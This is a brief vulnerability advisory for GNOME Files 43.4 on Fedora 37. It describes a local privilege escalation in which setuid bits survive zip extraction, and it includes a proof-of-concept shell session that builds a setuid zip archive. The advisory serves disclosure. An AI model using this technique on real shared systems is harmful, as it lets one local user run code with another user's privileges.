GNOME Files 43.4 Privilege Escalation

Affected: GNOME Files 43.4 (nautilus) on fedora 37Description:If an user A opens in GNOME files zip archive containing`setuid` file F, then F will be silently extracted toa subdirectory of CWD.If F is accessible by hostile local user B and B executes F,then F will be executed as from user A.tar(1) and unzip(1) are not vulnerable to this attack.Session for creating the ZIP.After that just open f.zip in GNOME files.<pre>[joro@fedora ~]$ umask0022[joro@fedora 2]$ mkdir /tmp/2 ; cd /tmp/2 ; echo hi > F ; chmod +xs F[joro@fedora 2]$ zip f F ; zipinfo fArchive:  f.zipZip file size: 155 bytes, number of entries: 1-rwsr-sr-x  3.0 unx        3 tx stor 23-Aug-05 12:38 F[joro@fedora 2]$ ls -ld /tmp/2/drwxr-xr-x. 2 joro joro 80 Aug  5 11:20 /tmp/2/[joro@fedora 2]$</pre>